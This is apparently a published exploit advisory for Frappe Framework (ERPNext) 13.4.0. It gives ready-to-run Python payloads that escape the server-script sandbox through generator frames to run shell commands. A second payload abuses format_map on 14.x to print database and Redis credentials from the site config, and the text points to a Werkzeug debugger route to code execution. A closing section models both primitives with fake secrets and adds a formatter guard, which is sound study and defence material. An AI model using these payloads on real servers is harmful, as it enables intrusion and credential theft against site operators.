# Exploit Title: Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)
# Exploit Author: Sander Ferdinand
# Date: 2023-06-07
# Version: 13.4.0
# Vendor Homepage: http://erpnext.org
# Software Link: https://github.com/frappe/frappe/
# Tested on: Ubuntu 22.04
# CVE : none

Silly sandbox escape.

> Frappe Framework uses the RestrictedPython library to restrict access to methods available for server scripts.

Requirements:

- 'System Manager' role (which is not necessarily the admin)
- Server config `server_script_enabled` set to `true` (likely)

Create a new script at `/app/server-script`, set type to API, method to 'lol', and visit `/api/method/lol` to execute the payload.

```python
hax = "echo pwned > /tmp/pwned"
# The generator body runs only when iterated; at that point gi_frame.f_back chains
# up through the sandbox's own call frames, and the host frame's f_builtins still
# holds the real __import__ that the restricted namespace withheld.
g=({k:v('os').popen(hax).read() for k,v in g.gi_frame.f_back.f_back.f_back.f_back.f_builtins.items() if 'import' in k}for x in(0,))
for x in g:0
```

Context:

- https://ur4ndom.dev/posts/2023-07-02-uiuctf-rattler-read/
- https://gist.github.com/lebr0nli/c2fc617390451f0e5a4c31c87d8720b6
- https://frappeframework.com/docs/v13/user/en/desk/scripting/server-script
- https://github.com/frappe/frappe/blob/v13.4.0/frappe/utils/safe_exec.py#L42

Bonus: more recent versions (14.40.1 as of writing) block `gi_frame`, but there is still a read primitive to escape the sandbox via `format_map`, because `str.format` performs the attribute and item traversal internally, with no attribute access visible in the script source:

```python
hax = """
{g.gi_frame.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_globals[frappe].local.conf}
""".strip()
# format_map walks the field path on the host's behalf and returns the repr of the
# host's frappe.local.conf; msgprint shows it to the (authenticated) caller.
g=(frappe.msgprint(hax.format_map({'g': g}))for x in(0,))
for x in g:0
```

This prints the Frappe site config, including database/Redis credentials, etc.

In the unlikely case that Werkzeug is running with `use_evalex`, you may use the same read primitive to retrieve the Werkzeug debugger PIN, then browse to `/console` (or raise an exception) for RCE.
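Both primitives above, modelled stand-alone in plain CPython as an added example (this is not code from the advisory or from the Frappe project). A toy `run_restricted` helper stands in for the sandbox by executing untrusted source with a whitelisted `__builtins__` dict; `SECRET_CONFIG` stands in for `frappe.local.conf`; `SAFE_BUILTINS`, `FRAME_WALK`, `FORMAT_MAP_LEAK` and `GuardedFormatter` are all constructed for the demo. The frame walk generalises the 13.4.0 payload by looping over `f_back` instead of hard-coding the depth, and the last helper shows one way to close the `format_map` channel: refuse any field name that contains `.` or `[`.

```python
"""Added example, not from the advisory or Frappe: a stand-alone model of
(1) the generator-frame walk to the host's real __import__, and
(2) str.format_map as an attribute-traversal read primitive,
plus a Formatter subclass that refuses traversal in field names."""
import os
import string

# Constructed stand-in for frappe.local.conf (fake values, never real credentials).
SECRET_CONFIG = {"db_password": "hunter2", "redis_cache": "redis://localhost:13000"}

# The "sandbox" namespace: no __import__, no open, no getattr.
SAFE_BUILTINS = {"len": len, "range": range, "str": str, "dict": dict}


def run_restricted(src: str) -> dict:
    """Toy sandbox (NOT RestrictedPython): exec untrusted source under a
    whitelisted __builtins__. It models the one property the escape abuses:
    the host frames above the exec'd code keep the real builtins and globals."""
    ns = {"__builtins__": SAFE_BUILTINS, "__name__": "untrusted", "result": None}
    exec(src, ns)  # deliberately executing the untrusted source
    return ns


# Primitive 1: while the generator body runs, gen.gi_frame.f_back is the frame
# iterating it, so following f_back climbs out of the exec'd code into the host.
# A loop replaces the fixed .f_back.f_back... chain of the 13.4.0 payload.
FRAME_WALK = """
def escape():
    f = gen.gi_frame.f_back
    while f is not None and "__import__" not in f.f_builtins:
        f = f.f_back
    real_import = f.f_builtins["__import__"]
    return real_import("os").getpid()   # harmless stand-in for os.popen(...)

gen = (escape() for _ in (0,))
for result in gen:
    pass
"""

# Primitive 2: no attribute access appears in the untrusted source; str.format
# does the traversal. Depth here: genexpr -> exec'd module -> run_restricted.
FORMAT_MAP_LEAK = """
template = "{g.gi_frame.f_back.f_back.f_globals[SECRET_CONFIG][db_password]}"
gen = (template.format_map({"g": gen}) for _ in (0,))
for result in gen:
    pass
"""


def frame_walk_escape() -> int:
    """Run the frame-walk payload; returns the host pid obtained via the
    host frame's real __import__."""
    return run_restricted(FRAME_WALK)["result"]


def format_map_leak() -> str:
    """Run the format_map payload; returns the leaked SECRET_CONFIG value."""
    return run_restricted(FORMAT_MAP_LEAK)["result"]


class GuardedFormatter(string.Formatter):
    """Formatter that refuses attribute ('.') and index ('[') traversal in field
    names, so "{g.gi_frame...}" and "{cfg[db_password]}" raise instead of resolving."""

    def get_field(self, field_name, args, kwargs):
        if "." in field_name or "[" in field_name:
            raise ValueError(f"traversal not allowed in field {field_name!r}")
        return super().get_field(field_name, args, kwargs)


def guarded_format_map(template: str, mapping: dict) -> str:
    """Drop-in for template.format_map(mapping) with traversal refused."""
    return GuardedFormatter().vformat(template, (), mapping)


def guard_blocks(template: str, mapping: dict) -> bool:
    """True if the guarded formatter rejects the template, False if it renders."""
    try:
        guarded_format_map(template, mapping)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("frame walk reached host __import__:", frame_walk_escape() == os.getpid())
    print("format_map leaked:", format_map_leak())
    print("guard blocks traversal:", guard_blocks("{g.gi_frame.f_back}", {"g": iter(())}))
```

The guarded formatter is the narrow fix for the `format_map` channel only; it does nothing about `gi_frame`, `f_back` or any other introspection attribute that the sandbox's name filter fails to cover, which is why blocking `gi_frame` by name in 14.x left the read primitive intact.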